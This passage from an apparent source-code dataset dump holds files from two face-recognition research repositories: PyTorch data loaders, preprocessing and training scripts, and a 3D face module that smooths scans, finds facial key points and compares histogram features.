pin_memory=conf.pin_memory, num_workers=conf.num_workers)\n return loader, class_num \n\n\n \ndef load_bin(path, rootdir, transform, image_size=[112,112]):\n if not rootdir.exists():\n rootdir.mkdir()\n bins, issame_list = pickle.load(open(str(path), 'rb'), encoding='bytes')\n data = bcolz.fill([len(bins), 3, image_size[0], image_size[1]], dtype=np.float32, rootdir=str(rootdir), mode='w')\n for i in range(len(bins)):\n _bin = bins[i]\n img = mx.image.imdecode(_bin).asnumpy()\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n img = Image.fromarray(img.astype(np.uint8))\n data[i, ...] = transform(img)\n i += 1\n if i % 1000 == 0:\n print('loading bin', i)\n print(data.shape)\n np.save(str(rootdir)+'_list', np.array(issame_list))\n return data, issame_list\n\ndef get_val_pair(path, name):\n carray = bcolz.carray(rootdir = os.path.join(path,name), mode='r')\n issame = np.load(path+'/{}_list.npy'.format(name))\n return carray, issame\n\ndef get_val_data(data_path):\n agedb_30, agedb_30_issame = get_val_pair(data_path, 'agedb_30')\n cfp_fp, cfp_fp_issame = get_val_pair(data_path, 'cfp_fp')\n lfw, lfw_issame = get_val_pair(data_path, 'lfw')\n return agedb_30, cfp_fp, lfw, agedb_30_issame, cfp_fp_issame, lfw_issame\n\ndef load_mx_rec(rec_path):\n save_path = rec_path/'imgs'\n if not save_path.exists():\n save_path.mkdir()\n imgrec = mx.recordio.MXIndexedRecordIO(str(rec_path/'train.idx'), str(rec_path/'train.rec'), 'r')\n img_info = imgrec.read_idx(0)\n header,_ = mx.recordio.unpack(img_info)\n max_idx = int(header.label[0])\n for idx in tqdm(range(1,max_idx)):\n img_info = imgrec.read_idx(idx)\n header, img = mx.recordio.unpack_img(img_info)\n label = int(header.label)\n img = Image.fromarray(img)\n label_path = save_path/str(label)\n if not label_path.exists():\n label_path.mkdir()\n img.save(label_path/'{}.jpg'.format(idx), quality=95)\n\n\n\nIMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\n\ndef accimage_loader(path):\n import accimage\n try:\n return accimage.Image(path)\n except IOError:\n # Potentially a decoding problem, fall back to PIL.Image\n return pil_loader(path)\n\n\ndef default_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n\n\ndef make_dataset(dir, class_to_idx, pseudo_classes, remove_single=True, extensions=None, is_valid_file=None):\n\n images = []\n dir = os.path.expanduser(dir)\n\n\n if not ((extensions is None) ^ (is_valid_file is None)):\n raise ValueError(\"Both extensions and is_valid_file cannot be None or not None at the same time\")\n if extensions is not None:\n def is_valid_file(x):\n return has_file_allowed_extension(x, extensions)\n flag = 0\n for target in sorted(class_to_idx.keys()):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n path = os.path.join(root, fname)\n if is_valid_file(path):\n #item = (path, class_to_idx[target])\n if remove_single and pseudo_classes[flag] == -1:\n flag += 1\n continue\n item = (path, pseudo_classes[flag])\n flag += 1\n images.append(item)\n return images\n \n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n extensions (tuple of strings): extensions to consider (lowercase)\n\n Returns:\n bool: True if the filename ends with one of given extensions\n \"\"\"\n return filename.lower().endswith(extensions)\n\n \n \nclass PSEUDO(DatasetFolder):\n def __init__(self, remove_single, root, pseudo_classes, transform=None, target_transform=None,\n loader=default_loader, is_valid_file=None):\n super(PSEUDO, self).__init__(root, loader, IMG_EXTENSIONS if is_valid_file is None else None,\n transform=transform,\n target_transform=target_transform)\n \n self.remove_single = remove_single\n classes, class_to_idx = self._find_classes(self.root)\n self.samples = make_dataset(self.root, class_to_idx, pseudo_classes, self.remove_single, self.extensions, is_valid_file)\n self.targets = [s[1] for s in self.samples]\n self.class_num = len(set(self.targets))\n\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns=0:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return sample, target\n\n\n def __len__(self):\n return len(self.samples)\n \n \n def _find_classes(self, dir):\n if sys.version_info >= (3, 5):\n # Faster and available in Python 3.5 and above\n classes = [d.name for d in os.scandir(dir) if d.is_dir()]\n else:\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\n\ndef get_pseudo_dataset(imgs_folder, pseudo_classes, remove_single):\n split_index = imgs_folder[1]\n train_transform = trans.Compose([\n trans.RandomHorizontalFlip(),\n trans.ToTensor(),\n trans.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n ])\n ds = PSEUDO(remove_single, os.path.join(str(imgs_folder[0]),'split_{}'.format(split_index)), pseudo_classes, train_transform)\n class_num = ds.class_num\n print('loading pseudo {}: {} done'.format(split_index, class_num))\n return ds, class_num\n\n\ndef get_pseudo_loader(conf, index):\n \n meta_file = open(conf.meta_file,'r')\n meta = meta_file.readlines()\n meta = meta[count[index-1]:count[index]]\n pseudo_classes = [int(item.split('\\n')[0]) for item in meta]\n meta_file.close()\n \n ds, class_num = get_pseudo_dataset([conf.pseudo_folder,index], pseudo_classes)\n loader = DataLoader(ds, batch_size=conf.batch_size, shuffle=True, pin_memory=conf.pin_memory, num_workers=conf.num_workers)\n return loader, class_num \n"
},
{
"alpha_fraction": 0.633128821849823,
"alphanum_fraction": 0.6392638087272644,
"avg_line_length": 32.875,
"blob_id": "2cdce5acd2344786a03c4a2e61cda831e9aac4dc",
"content_id": "379d9d67319281ae51fd23db137fbeb043204ba0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 815,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 24,
"path": "/preprocess.py",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "\nimport shutil\nimport os\nfrom pathlib import Path\nfrom tqdm import tqdm\n\ndef generate_dataset(src, dst, meta_file):\n\n lines= open(meta_file).readlines()\n for line in tqdm(lines):\n folder, img = line.strip().split('_')\n folder = folder.split('/')[0]\n nfolder = str(os.path.join(dst,folder))\n if not os.path.exists(nfolder):\n os.makedirs(nfolder)\n shutil.copyfile(os.path.join(src,folder,img), os.path.join(dst, nfolder, img))\n\n\nif __name__=='__main__':\n generate_dataset('faces_emore/imgs', 'emore/trainset', 'lists/part0_train.list')\n print('finishing training parts')\n\n for i in tqdm(range(1,10)):\n generate_dataset('faces_emore/imgs', 'emore/testset/split_%d'%i, 'lists/part%s_test.list'%i)\n print('finishing testing parts: split %d'%i)\n\n"
},
{
"alpha_fraction": 0.6239316463470459,
"alphanum_fraction": 0.6709401607513428,
"avg_line_length": 20.272727966308594,
"blob_id": "0b54904dcb500455901f8771029faec9a14132ce",
"content_id": "3311ccc4fff0dd08dcdccd41d1506a9ed3de32af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 11,
"path": "/train_multi.sh",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "GPUS=2,3\npath='result/model/split1_labels.txt'\nsplit=1\n\nexport CUDA_VISIBLE_DEVICES=$GPUS\n\npython3.5 multitask.py -net ir_se -b 250 -w 3 \\\n -meta_file $path \\\n -pseudo_folder emore/testset \\\n -remove_single \\\n -device 2 \\\n"
}
] | 5 |
Sewasale/Course-Face3D | https://github.com/Sewasale/Course-Face3D | b93a09f71dfcf1fd92f35715d900f1354dd916e3 | 252bb6ea0a0ee0a0a27738ec694b799bddda7e0b | 1c156ee5337f13b9d7944164264738f7473aa203 | refs/heads/master | 2020-04-16T09:30:22.416038 | 2019-01-14T03:10:22 | 2019-01-14T03:10:22 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5297029614448547,
"alphanum_fraction": 0.5346534848213196,
"avg_line_length": 27.592920303344727,
"blob_id": "a44c7bcd6eb4de38912e4cf9175b763549bb7b3e",
"content_id": "bd88fcce4e6d502876044be8a3da424197bcfd7a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3232,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 113,
"path": "/face3d/face.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass Face(object):\n\n def __init__(self, abs_file):\n self.abs_file = abs_file\n self.compressed = False\n self.features = False\n self.key_points = {}\n self.reset()\n\n def reset(self):\n self.set_view(0, 0, self.abs_file.width, self.abs_file.height)\n\n def set_view(self, x_min, y_min, x_max, y_max):\n self.x_min = x_min\n self.y_min = y_min\n self.x_max = x_max\n self.y_max = y_max\n\n def center_at(self, x, y, delta_x, delta_y):\n # Translate and sanitize input\n x = int(x) + self.x_min\n y = int(y) + self.y_min\n delta_x = int(delta_x)\n delta_y = int(delta_y) \n\n # Save difference\n old_x_min = self.x_min\n old_y_min = self.y_min\n\n # Check values\n if delta_x * 2 > self.abs_file.width:\n raise ValueError(\"Delta x out of range\")\n\n if delta_y * 2 > self.abs_file.height:\n raise ValueError(\"Delta y out of range\")\n\n # X axis\n if x + delta_x > self.abs_file.width:\n self.x_min = self.abs_file.width - delta_x - delta_x\n self.x_max = self.abs_file.width\n elif x - delta_x < 0:\n self.x_min = 0\n self.x_max = delta_x + delta_x\n else:\n self.x_min = x - delta_x\n self.x_max = x + delta_x\n\n # Y axis\n if y + delta_y > self.abs_file.height:\n self.y_min = self.abs_file.height - delta_y - delta_y\n self.y_max = self.abs_file.height\n elif y - delta_y < 0:\n self.y_min = 0\n self.y_max = delta_y + delta_y\n else:\n self.y_min = y - delta_y\n self.y_max = y + delta_y\n\n # Translate each point\n for name, point in self.key_points.iteritems():\n x, y = point\n self.key_points[name] = (x + (old_x_min - self.x_min), y + (old_y_min - self.y_min))\n\n def add_key_point(name, x, y):\n self.key_points[name] = (x + self.x_min, y + self.y_min)\n\n @property\n def X(self):\n return self.abs_file.data['X'][range(self.y_min, self.y_max), :][:, range(self.x_min, self.x_max)]\n\n @property\n def Y(self):\n return self.abs_file.data['Y'][range(self.y_min, self.y_max), :][:, range(self.x_min, self.x_max)]\n\n @property\n def Z(self):\n return self.abs_file.data['Z'][range(self.y_min, self.y_max), :][:, range(self.x_min, self.x_max)]\n\n @property\n def width(self):\n return self.x_max - self.x_min \n\n @property\n def height(self):\n return self.y_max - self.y_min\n\n def plot_3d(self):\n figure = pyplot.figure()\n\n # Draw surface\n axis = Axes3D(figure)\n axis.plot_surface(X=self.X, Y=self.Y, Z=self.Z)\n\n return figure\n\n def compress(self):\n self.abs_file.data['X'] = self.X\n self.abs_file.data['Y'] = self.Y\n self.abs_file.data['Z'] = self.Z\n\n self.abs_file.col_size = self.width\n self.abs_file.row_size = self.height\n\n self.compressed = True\n self.reset()\n\n"
},
{
"alpha_fraction": 0.7365269660949707,
"alphanum_fraction": 0.7604790329933167,
"avg_line_length": 20,
"blob_id": "be0cb7db4707fbe6d65c49d4ecab3bed980aef03",
"content_id": "6ba65cb70855f934929188886df12ff831af9f2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 8,
"path": "/face3d/__init__.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom absfile import AbsFile\nfrom face import Face\nfrom database import Database"
},
{
"alpha_fraction": 0.5495901703834534,
"alphanum_fraction": 0.5719262361526489,
"avg_line_length": 31.75838851928711,
"blob_id": "acb8413392e2ab32cb2ae5d64c93ffa1da576915",
"content_id": "745dd117ff9afaad22aa4831bc815c234d452f4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4880,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 149,
"path": "/CourseTest.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "#from __future__ import print_function\nimport Face3D as rc\n#import xlrd, xlwt\nimport os\nimport glob\n\n# def RunByParams(authenticate=None,\n# enroll=None,\n# person_id=None,\n# auto_id=False,\n# reevaluate=False,\n# depth_map=None,\n# feature_map=None,\n# similarity_matrix=None,\n# roc_curve=None,\n# draw_key_points=False,\n# database='database.db',\n# parametes='K=12,N=67'):\n\n\ndef get_person_ids():\n all_person = [os.path.basename(path)[:5] for path in os.listdir('E:/BosphorusDB/abs/')]\n return all_person\n\n\ndef get_faces(person, method):\n base_folder = 'E:/BosphorusDB/abs/'\n\n mask = base_folder + person + '_filtered/*_' + method + '.abs'\n faces = glob.glob(mask)\n\n return faces\n\ndef get_person_folder(person):\n base_folder = 'E:/BosphorusDB/abs/'\n\n return base_folder + person + '_filtered/'\n\n\ndef enroll_method(persons, method):\n print method\n\n dbName = 'FullBase'\n\n for person in persons:\n print person\n person_folder = get_person_folder(person)\n print dbName\n enroll_faces(person, person_folder, dbName, method)\n copy_to_dbs(person, dbName, method)\n\n\ndef copy_to_dbs(person_id, dbFrom, method):\n dbs = [\n ['Face', ['N', 'LFAU', 'UFAU', 'CAU', 'E']],\n ['FaceOcclusion', ['N', 'LFAU', 'UFAU', 'CAU', 'E', 'O']],\n ['FacePitchRotation', ['N', 'LFAU', 'UFAU', 'CAU', 'E', 'PR']],\n\n ['Rotation', ['YR', 'CR', 'PR']]\n ]\n\n db_from_path = './db/' + method + '_' + dbFrom + '.db'\n for dbName, masks in dbs:\n for mask in masks:\n try:\n rc.RunByParams(copy_to_database='./db/' + method + '_' + dbName + '.db',\n mask='_' + mask + '_',\n database=db_from_path)\n except:\n print 'bad face %s' % person_id\n\n\ndef enroll_faces(person_id, folder, db_name, method):\n\n try:\n rc.RunByParams(enroll=folder, person_id=person_id, database='./db/' + method + '_' + db_name + '.db', mask=method)\n except:\n print 'bad face %s' % person_id\n\n\ndef get_faces_for_db(faces, masks):\n result = []\n for mask in masks:\n result.extend([f for f in faces if ('_' + mask + '_') in f])\n\n return result\n\n\npersons = get_person_ids()\n\nmethods = ['CLE', 'MDM', 'MMF', 'MDR', 'M1R', 'M1M', 'GHA', 'GHM', 'GHR', 'BOF', 'M1A', 'BF1', 'MDA', 'MR1', 'MRK']\nfor method in methods:\n try:\n enroll_method(persons, method)\n # try:\n # rc.RunByParams(roc_curve='./roc/' + method + 'roc-curve.pdf', database=method + '.db')\n # except:\n # print 'bad method %s' % method\n except:\n print 'very bad method %s' % method\n\n\n\n#enroll_faces('bs045', ['C:/Users/SW/Music/CSU/abs/'], 'test')\n# rc.RunByParams(enroll='C:/Users/SW/Music/CSU/abs/', person_id='bs045', database='./db/' + 'test1' + '.db', mask='CLE')\n# rc.RunByParams(copy_to_database='Test_n1', mask='_N_N_1_', database='./db/' + 'test' + '.db')\n\n# wb = xlwt.Workbook()\n# ws = wb.add_sheet('Test')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_0_BOF.abs', person_id='bs000', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_1_BOF.abs', person_id='bs000', database='BOF.db')\n#\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_0_BOF.abs', person_id='bs104', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_1_BOF.abs', person_id='bs104', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_2_BOF.abs', person_id='bs104', database='BOF.db')\n# rc.RunByParams(enroll='E:/BosphorusDB/abs/bs104_filtered/bs104_N_N_3_BOF.abs', person_id='bs104', database='BOF.db')\n#\n#\n#(c, result) = rc.RunByParams(roc_curve='E:/mm.pdf', database='BOF.db')\n\n# for i, res in enumerate(result):\n# j = 1\n# for p, s in res:\n# ws.write(i, j, p)\n# j = j + 1\n# ws.write(i, j, s)\n# j = j + 1\n#\n#\n# wb.save('E:/xl_rec.xls')\n# #\n# for i, res in enumerate(result):\n# print \"bs096_N_N_0_BOF Mathod %d\" % (i)\n# for p, s in res:\n# print \"Match with person %s with scores %s\" % (p, s)\n#\n# (c, result) = rc.RunByParams(authenticate='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_1_CLE.abs', database='BOF.db')\n#\n# for i, res in enumerate(result):\n# print \"bs000_N_N_1_CLE Mathod %d\" % (i)\n# for p, s in res:\n# print \"Match with person %s with scores %s\" % (p, s)\n#\n# (c, result) = rc.RunByParams(authenticate='E:/BosphorusDB/abs/bs000_filtered/bs000_N_N_0_CLE.abs', database='BOF.db')\n#\n# for i, res in enumerate(result):\n# print \"bs000_N_N_0_CLE Mathod %d\" % (i)\n# for p, s in res:\n# print \"Match with person %s with scores %s\" % (p, s)"
},
{
"alpha_fraction": 0.600045919418335,
"alphanum_fraction": 0.6135346293449402,
"avg_line_length": 31.935728073120117,
"blob_id": "2cbf7d642429a9158076d5dcc87157831a03642f",
"content_id": "ab76019ec929e7f50f2650ce35468a971c2d2e43",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17422,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 529,
"path": "/face3d/algorithms.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom utils import intertial_axis, max_xy, min_xy, find_peak_start, find_peak_stop\n\nfrom scipy.ndimage import filters, interpolation\nfrom scipy.interpolate import griddata\nfrom scipy import stats, signal, optimize, interpolate\nfrom sklearn import metrics\n\nimport numpy\nimport scipy\nimport math\nimport pylab\nimport threading\n\ndef process(face, N, K):\n \"\"\" Apply the selected algorithms on a given face \"\"\"\n\n # Normalize face\n smooth(face)\n repair(face)\n crop(face)\n zoom(face)\n key_points(face)\n rotate(face)\n key_points(face)\n fit(face)\n\n # Extract features\n features_histogram(face, N, K)\n\ndef smooth(face):\n \"\"\" Smooth data. Removes peaks \"\"\"\n\n # Helper method\n def smooth_axis(axis):\n face.abs_file.data[axis] = filters.median_filter(face.abs_file.data[axis], size=4)\n face.abs_file.data[axis] = filters.gaussian_filter(face.abs_file.data[axis], sigma=1, mode='nearest')\n\n # Smooth it\n smooth_axis('X')\n smooth_axis('Y')\n smooth_axis('Z')\n\ndef repair(face):\n \"\"\" Fill missing data by interpolating \"\"\"\n\n # Helper method\n def interpolate_axis(axis):\n A = face.abs_file.data[axis]\n\n # Calculate parameters\n mask = numpy.isfinite(A)\n points = mask.nonzero()\n values = A[points]\n grid_coords = numpy.meshgrid(numpy.arange(0, len(A[:, 0]), 1), numpy.arange(0, len(A[0, :]), 1))\n\n # Apply interpolation\n face.abs_file.data[axis] = griddata(points, values, grid_coords, method='linear').T\n\n interpolate_axis('X')\n interpolate_axis('Y')\n interpolate_axis('Z')\n\ndef key_points(face, \n d_nose_x1=30, d_nose_x2=5, d_nose_y=5,\n d_lip_y1=25, d_lip_y2=70, d_lip_y3=4, d_lip_x1=45,\n d_chin_x=3, d_chin_y1=10, d_chin_y2=75,\n d_eye_x=2, d_eye_y=50):\n\n \"\"\"\n Rotate and zoom the face to create a full frame face. This is based on the\n fact that the nose is the highest point of the picture\n \"\"\"\n\n # We apply surfature to calculate the first and second derivates\n K, H, Pmax, Pmin = surfature(face)\n\n # Remove all key points \n face.key_points.clear()\n\n #\n # Nose\n #\n nose_x, nose_y = max_xy(face.Z)\n face.key_points[\"nose\"] = (nose_x, nose_y)\n\n #\n # Nose left and right\n #\n nose_left = Pmin[(nose_y - d_nose_y):(nose_y + d_nose_y), (nose_x - d_nose_x1):(nose_x - d_nose_x2)]\n nose_right = Pmin[(nose_y - d_nose_y):(nose_y + d_nose_y), (nose_x + d_nose_x2):(nose_x + d_nose_x1)]\n\n nose_left_x, nose_left_y = min_xy(nose_left, offset_x=(nose_x - d_nose_x1), offset_y=(nose_y - d_nose_y))\n nose_right_x, nose_right_y = min_xy(nose_right, offset_x=(nose_x + d_nose_x2), offset_y=(nose_y - d_nose_y))\n\n face.key_points[\"nose_left\"] = (nose_left_x, nose_left_y)\n face.key_points[\"nose_right\"] = (nose_right_x, nose_right_y)\n\n # \n # Upper, lower, left right lip\n #\n lip_y = numpy.nanargmax(Pmax[(nose_y + d_lip_y1):(nose_y + d_lip_y2), nose_x]) + (nose_y + d_lip_y1)\n lip_left = Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), (nose_x - d_lip_x1):nose_x]\n lip_right = Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), nose_x:(nose_x + d_lip_x1)]\n\n lip_left_x = find_peak_start(numpy.sum(lip_left, axis=0)) + (nose_x - d_lip_x1)\n lip_left_y = numpy.nanargmax(Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), lip_left_x]) + (lip_y - d_lip_y3)\n\n lip_right_x = find_peak_stop(numpy.sum(lip_right, axis=0)) + nose_x\n lip_right_y = numpy.nanargmax(Pmax[(lip_y - d_lip_y3):(lip_y + d_lip_y3), lip_right_x]) + (lip_y - d_lip_y3)\n\n face.key_points['lip'] = (nose_x, lip_y)\n face.key_points['lip_left'] = (lip_left_x, lip_left_y)\n face.key_points['lip_right'] = (lip_right_x, lip_right_y)\n\n #\n # Chin\n #\n chin = numpy.gradient(signal.bspline(face.Z[(lip_y + d_chin_y1):, nose_x], 25))\n chin_x, chin_y = nose_x, numpy.nanargmin(chin) + (lip_y + d_chin_y1)\n\n face.key_points[\"chin\"] = (chin_x, chin_y)\n\n # \n # Eyes\n #\n eye_left = Pmax[nose_left_y - d_eye_y:nose_left_y + d_eye_y, nose_left_x - d_eye_x:nose_left_x + d_eye_x]\n eye_right = Pmax[nose_right_y - d_eye_y:nose_right_y + d_eye_y, nose_right_x - d_eye_x:nose_right_x + d_eye_x]\n\n eye_left_x, eye_left_y = max_xy(eye_left, nose_left_x - d_eye_x, d_eye_y)\n eye_right_x, eye_right_y = max_xy(eye_right, nose_right_x - d_eye_x, d_eye_y)\n\n face.key_points[\"eye_left\"] = (eye_left_x, eye_left_y)\n face.key_points[\"eye_right\"] = (eye_right_x, eye_right_y)\n\n #\n # Nose face border\n #\n nose_line = numpy.gradient(face.Z[nose_y, :])\n border_nose_left_x, border_nose_left_y = numpy.nanargmax(nose_line[:lip_left_x - 10]), nose_y\n border_nose_right_x, border_nose_right_y = numpy.nanargmin(nose_line[lip_right_x:]) + lip_right_x + 10, nose_y\n\n face.key_points[\"border_nose_left\"] = (border_nose_left_x, border_nose_left_y)\n face.key_points[\"border_nose_right\"] = (border_nose_right_x, border_nose_right_y)\n\n #\n # Lip face border\n #\n lip_line = numpy.gradient(face.Z[lip_y, :])\n border_lip_left_x, border_lip_left_y = numpy.nanargmax(lip_line[:lip_left_x - 10]), lip_y\n border_lip_right_x, border_lip_right_y = numpy.nanargmin(lip_line[lip_right_x:]) + lip_right_x + 10, lip_y\n\n face.key_points[\"border_lip_left\"] = (border_lip_left_x, border_lip_left_y)\n face.key_points[\"border_lip_right\"] = (border_lip_right_x, border_lip_right_y)\n\n #\n # Forehead border\n #\n forehead_line = numpy.gradient(face.Z[nose_y - (chin_y - nose_y), :])\n border_forehead_left_x, border_forehead_left_y = numpy.nanargmax(forehead_line[:lip_left_x - 10]), nose_y - (chin_y - nose_y)\n border_forehead_right_x, border_forehead_right_y = numpy.nanargmin(forehead_line[lip_right_x:]) + lip_right_x + 10, nose_y - (chin_y - nose_y)\n\n face.key_points[\"border_forehead_left\"] = (border_forehead_left_x, border_forehead_left_y)\n face.key_points[\"border_forehead_right\"] = (border_forehead_right_x, border_forehead_right_y)\n\ndef rotate(face):\n \"\"\" Rotate the face by taking the mean slope of the nose and lip \"\"\"\n\n # Nose rotation\n d_nose_y = face.key_points[\"nose_left\"][1] - face.key_points[\"nose_right\"][1]\n d_nose_x = face.key_points[\"nose_right\"][0] - face.key_points[\"nose_left\"][0]\n degrees_nose = math.degrees(math.atan2(d_nose_y, d_nose_x))\n\n # Lip rotation\n d_lip_y = face.key_points[\"lip_left\"][1] - face.key_points[\"lip_right\"][1]\n d_lip_x = face.key_points[\"lip_right\"][0] - face.key_points[\"lip_left\"][0]\n degrees_lip = math.degrees(math.atan2(d_lip_y, d_lip_x))\n\n # Calculate average rotation and rotate\n degrees = (degrees_nose + degrees_lip) / 2\n face.abs_file.data['X'] = interpolation.rotate(face.abs_file.data['X'], degrees, mode='nearest', prefilter=False, reshape=False)\n face.abs_file.data['Y'] = interpolation.rotate(face.abs_file.data['Y'], degrees, mode='nearest', prefilter=False, reshape=False)\n face.abs_file.data['Z'] = interpolation.rotate(face.abs_file.data['Z'], degrees, mode='nearest', prefilter=False, reshape=False)\n\ndef zoom(face):\n \"\"\" Move everything such that nose is at depth 0 \"\"\"\n\n # Correct the nose tip to be at 0\n point = max_xy(face.Z)\n\n face.abs_file.data['X'] = face.abs_file.data['X'] + abs(face.X[point])\n face.abs_file.data['Y'] = face.abs_file.data['Y'] + abs(face.Y[point])\n face.abs_file.data['Z'] = face.abs_file.data['Z'] + abs(face.Z[point])\n\ndef fit(face):\n \"\"\" Crops the image to face width and face height \"\"\"\n\n chin_x, chin_y = face.key_points[\"chin\"]\n nose_x, nose_y = face.key_points[\"nose\"]\n\n border_lip_left_x, border_lip_left_y = face.key_points[\"border_lip_left\"]\n border_lip_right_x, border_lip_right_y = face.key_points[\"border_lip_right\"]\n\n border_forehead_left_x, border_forehead_left_y = face.key_points[\"border_forehead_left\"]\n border_forehead_right_x, border_forehead_right_y = face.key_points[\"border_forehead_right\"]\n\n golden_ratio = 1.61803399\n face_height = (chin_y - nose_y) + (chin_y - nose_y) * golden_ratio\n #face_width = stats.nanmean(numpy.array([border_forehead_right_x, border_lip_right_x])) - stats.nanmean(numpy.array([border_forehead_left_x + border_lip_left_x]))\n face_width = face_height / golden_ratio\n\n # Overscan\n face_height = face_height * 0.90\n face_width = face_width * 0.95\n\n # Fit region\n face.center_at(nose_x, chin_y - (face_height / 2.0), face_width / 2.0, face_height / 2.0)\n\ndef crop(face):\n \"\"\" \n Crop the image to remove as much unneeded information as possible. This\n works by applying PCA to find the torso and then find the nose.\n\n The result is a view that is centered at the nose.\n \"\"\"\n\n # Reset image first to make sure we take all of the image\n face.reset()\n\n # Calculate the position of the image\n masked_z = numpy.ma.masked_array(face.Z, numpy.isnan(face.Z))\n x, y, covariance = intertial_axis(masked_z)\n\n # Center at the point\n overscan_x = face.width * 0.25\n overscan_y = face.height * 0.25\n face.center_at(x, y, overscan_x, overscan_y)\n\n # Calculate max Z-value x and y\n x, y = max_xy(face.Z)\n\n # Set view to center of nose\n face.center_at(x, y, face.width / 2.0, face.height / 2.0)\n\ndef features_histogram(face, N=67, K=12):\n \"\"\"\n From 'A 3D Face Recognition Algorithm Using Histogram-based Features'\n \"\"\"\n\n # It only works with non-nan values\n masked_z = numpy.ma.masked_array(face.Z, numpy.isnan(face.Z))\n results = []\n\n # Split the complete Z matrix into N smaller Zi\n for i, Zi in zip(range(N), numpy.array_split(masked_z, N)):\n result, temp = numpy.histogram(Zi, bins=K, range=(Zi.min(), Zi.max()), density=False)\n results.append(result)\n\n # Convert back to array\n face.features = (\"histogram\", numpy.array(results).reshape(-1), (N, K))\n\ndef distance_histogram_city_block(face1, face2):\n \"\"\" \n Calculate the City Block distance of two histogram feature vectors \n \"\"\"\n\n def _func(U, V, U_V):\n return numpy.sum([ numpy.abs(Ui - Vi) for Ui, Vi in U_V ])\n\n return distance_histogram(face1, face2, _func)\n\ndef distance_histogram_euclidean(face1, face2):\n \"\"\" \n Calculate the Euclidean distance of two histogram feature vectors \n \"\"\"\n\n def _func(U, V, U_V):\n return numpy.sqrt(numpy.sum([ numpy.power(Ui - Vi, 2) for Ui, Vi in U_V ]))\n\n return distance_histogram(face1, face2, _func)\n\ndef distance_histogram_correlation(face1, face2):\n \"\"\"\n Calculate the Sample Correlation Coefficient of two histogram feature vectors\n \"\"\"\n\n def _func(U, V, U_V):\n Umean = U.mean()\n Vmean = V.mean()\n Ustd = U.std()\n Vstd = V.std()\n\n samples = [ (Ui - Umean)*(Vi - Vmean) for Ui, Vi in U_V ]\n return numpy.sum(samples) / ((len(samples) - 1) * Ustd * Vstd)\n\n return distance_histogram(face1, face2, _func)\n\ndef distance_histogram(face1, face2, func):\n \"\"\" Base method for distance funcions \"\"\"\n\n U = face1.features[1]\n V = face2.features[1]\n\n # Make sure both are same size\n if U.shape != V.shape:\n raise Exception(\"Feature vectors do not match size\")\n\n # Calculate the distance\n return func(U, V, zip(U, V))\n\ndef similarity_matrix(faces, methods=None, normalizers=None, limit=None):\n \"\"\" \n Calculate the similarity matrix for given set of 